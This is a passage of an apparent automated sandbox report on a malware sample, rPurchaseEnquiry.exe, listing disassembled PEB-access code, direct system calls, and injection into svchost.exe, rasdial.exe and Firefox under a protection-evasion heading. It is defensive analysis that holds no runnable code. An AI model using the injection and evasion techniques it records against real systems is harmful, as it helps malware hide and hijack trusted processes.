                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F8B28 mov eax, dword ptr fs:[00000030h]3_2_038F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F8B28 mov eax, dword ptr fs:[00000030h]3_2_038F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E4B4B mov eax, dword ptr fs:[00000030h]3_2_038E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E4B4B mov eax, dword ptr fs:[00000030h]3_2_038E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03902B57 mov eax, dword ptr fs:[00000030h]3_2_03902B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03902B57 mov eax, dword ptr fs:[00000030h]3_2_03902B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03902B57 mov eax, dword ptr fs:[00000030h]3_2_03902B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03902B57 mov eax, dword ptr fs:[00000030h]3_2_03902B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C6B40 mov eax, dword ptr fs:[00000030h]3_2_038C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C6B40 mov eax, dword ptr fs:[00000030h]3_2_038C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FAB40 mov eax, dword ptr fs:[00000030h]3_2_038FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D8B42 mov eax, dword ptr fs:[00000030h]3_2_038D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03828B50 mov eax, dword ptr fs:[00000030h]3_2_03828B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DEB50 mov eax, dword ptr fs:[00000030h]3_2_038DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382CB7E mov eax, dword ptr fs:[00000030h]3_2_0382CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383EA80 mov eax, dword ptr fs:[00000030h]3_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383EA80 mov eax, dword ptr fs:[00000030h]3_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383EA80 mov eax, dword ptr fs:[00000030h]3_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383EA80 mov eax, dword ptr fs:[00000030h]3_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383EA80 mov eax, dword ptr fs:[00000030h]3_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383EA80 mov eax, dword ptr fs:[00000030h]3_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383EA80 mov eax, dword ptr fs:[00000030h]3_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383EA80 mov eax, dword ptr fs:[00000030h]3_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383EA80 mov eax, dword ptr fs:[00000030h]3_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03904A80 mov eax, dword ptr fs:[00000030h]3_2_03904A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03868A90 mov edx, dword ptr fs:[00000030h]3_2_03868A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03838AA0 mov eax, dword ptr fs:[00000030h]3_2_03838AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03838AA0 mov eax, dword ptr fs:[00000030h]3_2_03838AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03886AA4 mov eax, dword ptr fs:[00000030h]3_2_03886AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03886ACC mov eax, dword ptr fs:[00000030h]3_2_03886ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03886ACC mov eax, dword ptr fs:[00000030h]3_2_03886ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03886ACC mov eax, dword ptr fs:[00000030h]3_2_03886ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03830AD0 mov eax, dword ptr fs:[00000030h]3_2_03830AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03864AD0 mov eax, dword ptr fs:[00000030h]3_2_03864AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03864AD0 mov eax, dword ptr fs:[00000030h]3_2_03864AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386AAEE mov eax, dword ptr fs:[00000030h]3_2_0386AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386AAEE mov eax, dword ptr fs:[00000030h]3_2_0386AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BCA11 mov eax, dword ptr fs:[00000030h]3_2_038BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386CA24 mov eax, dword ptr fs:[00000030h]3_2_0386CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385EA2E mov eax, dword ptr fs:[00000030h]3_2_0385EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03854A35 mov eax, dword ptr fs:[00000030h]3_2_03854A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03854A35 mov eax, dword ptr fs:[00000030h]3_2_03854A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386CA38 mov eax, dword ptr fs:[00000030h]3_2_0386CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03836A50 mov eax, dword ptr fs:[00000030h]3_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03836A50 mov eax, dword ptr fs:[00000030h]3_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03836A50 mov eax, dword ptr fs:[00000030h]3_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03836A50 mov eax, dword ptr fs:[00000030h]3_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03836A50 mov eax, dword ptr fs:[00000030h]3_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03836A50 mov eax, dword ptr fs:[00000030h]3_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03836A50 mov eax, dword ptr fs:[00000030h]3_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840A5B mov eax, dword ptr fs:[00000030h]3_2_03840A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840A5B mov eax, dword ptr fs:[00000030h]3_2_03840A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386CA6F mov eax, dword ptr fs:[00000030h]3_2_0386CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386CA6F mov eax, dword ptr fs:[00000030h]3_2_0386CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386CA6F mov eax, dword ptr fs:[00000030h]3_2_0386CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DEA60 mov eax, dword ptr fs:[00000030h]3_2_038DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038ACA72 mov eax, dword ptr fs:[00000030h]3_2_038ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038ACA72 mov eax, dword ptr fs:[00000030h]3_2_038ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038309AD mov eax, dword ptr fs:[00000030h]3_2_038309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038309AD mov eax, dword ptr fs:[00000030h]3_2_038309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B89B3 mov esi, dword ptr fs:[00000030h]3_2_038B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B89B3 mov eax, dword ptr fs:[00000030h]3_2_038B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B89B3 mov eax, dword ptr fs:[00000030h]3_2_038B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C69C0 mov eax, dword ptr fs:[00000030h]3_2_038C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A9D0 mov eax, dword ptr fs:[00000030h]3_2_0383A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A9D0 mov eax, dword ptr fs:[00000030h]3_2_0383A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A9D0 mov eax, dword ptr fs:[00000030h]3_2_0383A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A9D0 mov eax, dword ptr fs:[00000030h]3_2_0383A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A9D0 mov eax, dword ptr fs:[00000030h]3_2_0383A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A9D0 mov eax, dword ptr fs:[00000030h]3_2_0383A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038649D0 mov eax, dword ptr fs:[00000030h]3_2_038649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FA9D3 mov eax, dword ptr fs:[00000030h]3_2_038FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BE9E0 mov eax, dword ptr fs:[00000030h]3_2_038BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038629F9 mov eax, dword ptr fs:[00000030h]3_2_038629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038629F9 mov eax, dword ptr fs:[00000030h]3_2_038629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE908 mov eax, dword ptr fs:[00000030h]3_2_038AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE908 mov eax, dword ptr fs:[00000030h]3_2_038AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BC912 mov eax, dword ptr fs:[00000030h]3_2_038BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03828918 mov eax, dword ptr fs:[00000030h]3_2_03828918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03828918 mov eax, dword ptr fs:[00000030h]3_2_03828918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B892A mov eax, dword ptr fs:[00000030h]3_2_038B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C892B mov eax, dword ptr fs:[00000030h]3_2_038C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B0946 mov eax, dword ptr fs:[00000030h]3_2_038B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03904940 mov eax, dword ptr fs:[00000030h]3_2_03904940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03856962 mov eax, dword ptr fs:[00000030h]3_2_03856962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03856962 mov eax, dword ptr fs:[00000030h]3_2_03856962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03856962 mov eax, dword ptr fs:[00000030h]3_2_03856962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0387096E mov eax, dword ptr fs:[00000030h]3_2_0387096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0387096E mov edx, dword ptr fs:[00000030h]3_2_0387096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0387096E mov eax, dword ptr fs:[00000030h]3_2_0387096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D4978 mov eax, dword ptr fs:[00000030h]3_2_038D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D4978 mov eax, dword ptr fs:[00000030h]3_2_038D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BC97C mov eax, dword ptr fs:[00000030h]3_2_038BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03830887 mov eax, dword ptr fs:[00000030h]3_2_03830887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BC89D mov eax, dword ptr fs:[00000030h]3_2_038BC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E8C0 mov eax, dword ptr fs:[00000030h]3_2_0385E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_039008C0 mov eax, dword ptr fs:[00000030h]3_2_039008C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FA8E4 mov eax, dword ptr fs:[00000030h]3_2_038FA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386C8F9 mov eax, dword ptr fs:[00000030h]3_2_0386C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386C8F9 mov eax, dword ptr fs:[00000030h]3_2_0386C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BC810 mov eax, dword ptr fs:[00000030h]3_2_038BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03852835 mov eax, dword ptr fs:[00000030h]3_2_03852835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03852835 mov eax, dword ptr fs:[00000030h]3_2_03852835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03852835 mov eax, dword ptr fs:[00000030h]3_2_03852835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03852835 mov ecx, dword ptr fs:[00000030h]3_2_03852835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03852835 mov eax, dword ptr fs:[00000030h]3_2_03852835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03852835 mov eax, dword ptr fs:[00000030h]3_2_03852835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386A830 mov eax, dword ptr fs:[00000030h]3_2_0386A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D483A mov eax, dword ptr fs:[00000030h]3_2_038D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D483A mov eax, dword ptr fs:[00000030h]3_2_038D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03860854 mov eax, dword ptr fs:[00000030h]3_2_03860854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03834859 mov eax, dword ptr fs:[00000030h]3_2_03834859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03834859 mov eax, dword ptr fs:[00000030h]3_2_03834859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BE872 mov eax, dword ptr fs:[00000030h]3_2_038BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BE872 mov eax, dword ptr fs:[00000030h]3_2_038BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C6870 mov eax, dword ptr fs:[00000030h]3_2_038C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C6870 mov eax, dword ptr fs:[00000030h]3_2_038C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386CF80 mov eax, dword ptr fs:[00000030h]3_2_0386CF80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03862F98 mov eax, dword ptr fs:[00000030h]3_2_03862F98
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03862F98 mov eax, dword ptr fs:[00000030h]3_2_03862F98
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03832FC8 mov eax, dword ptr fs:[00000030h]3_2_03832FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03832FC8 mov eax, dword ptr fs:[00000030h]3_2_03832FC8
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BE80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_00BE80A9
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BBA124 SetUnhandledExceptionFilter,0_2_00BBA124
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BBA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00BBA155

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exeNtAllocateVirtualMemory: Direct from: 0x77172BFCJump to behavior
                Source: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exeNtDelayExecution: Direct from: 0x77172DDCJump to behavior
                Source: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exeNtProtectVirtualMemory: Direct from: 0x77167B2EJump to behavior
                Source: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exeNtQuerySystemInformation: Direct from: 0x77172DFCJump to behavior
                Source: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exeNtReadFile: Direct from: 0x77172ADCJump to behavior
                Source: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exeNtQueryInformationProcess: Direct from: 0x77172C26Jump to behavior
                Source: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exeNtResumeThread: Direct from: 0x77172FBCJump to behavior
                Source: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exeNtWriteVirtualMemory: Direct from: 0x7717490CJump to behavior
                Source: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exeNtCreateUserProcess: Direct from: 0x7717371CJump to behavior
                Source: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exeNtOpenKeyEx: Direct from: 0x77172B9CJump to behavior
                Source: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exeNtNotifyChangeKey: Direct from: 0x77173C2CJump to behavior
                Source: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exeNtSetInformationProcess: Direct from: 0x77172C5CJump to behavior
                Source: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exeNtProtectVirtualMemory: Direct from: 0x77172F9CJump to behavior
                Source: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exeNtResumeThread: Direct from: 0x771736ACJump to behavior
                Source: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exeNtMapViewOfSection: Direct from: 0x77172D1CJump to behavior
                Source: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exeNtWriteVirtualMemory: Direct from: 0x77172E3CJump to behavior
                Source: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exeNtCreateMutant: Direct from: 0x771735CCJump to behavior
                Source: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exeNtDeviceIoControlFile: Direct from: 0x77172AECJump to behavior
                Source: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exeNtAllocateVirtualMemory: Direct from: 0x77172BECJump to behavior
                Source: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exeNtTerminateThread: Direct from: 0x77172FCCJump to behavior
                Source: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exeNtQueryInformationToken: Direct from: 0x77172CACJump to behavior
                Source: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exeNtCreateFile: Direct from: 0x77172FECJump to behavior
                Source: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exeNtOpenFile: Direct from: 0x77172DCCJump to behavior
                Source: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exeNtClose: Direct from: 0x77172B6C
                Source: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exeNtSetInformationThread: Direct from: 0x771663F9Jump to behavior
                Source: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exeNtAllocateVirtualMemory: Direct from: 0x77173C9CJump to behavior
                Source: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exeNtQueryAttributesFile: Direct from: 0x77172E6CJump to behavior
                Source: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exeNtSetInformationThread: Direct from: 0x77172B4CJump to behavior
                Source: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exeNtReadVirtualMemory: Direct from: 0x77172E8CJump to behavior
                Source: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exeNtCreateKey: Direct from: 0x77172C6CJump to behavior
                Source: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exeNtQueryVolumeInformationFile: Direct from: 0x77172F2CJump to behavior
                Source: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exeNtAllocateVirtualMemory: Direct from: 0x771748ECJump to behavior
                Source: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exeNtQuerySystemInformation: Direct from: 0x771748CCJump to behavior
                Source: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exeNtOpenSection: Direct from: 0x77172E0CJump to behavior
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\rasdial.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: NULL target: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: NULL target: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeThread register set: target process: 7584Jump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeThread APC queued: target process: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exeJump to behavior
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: D03008Jump to behavior
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BE87B1 LogonUserW,0_2_00BE87B1
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00B93B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00B93B3A
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00B948D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00B948D7
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BF4C27 mouse_event,0_2_00BF4C27
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\rPurchaseEnquiry.exe"Jump to behavior
                Source: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exeProcess created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"Jump to behavior
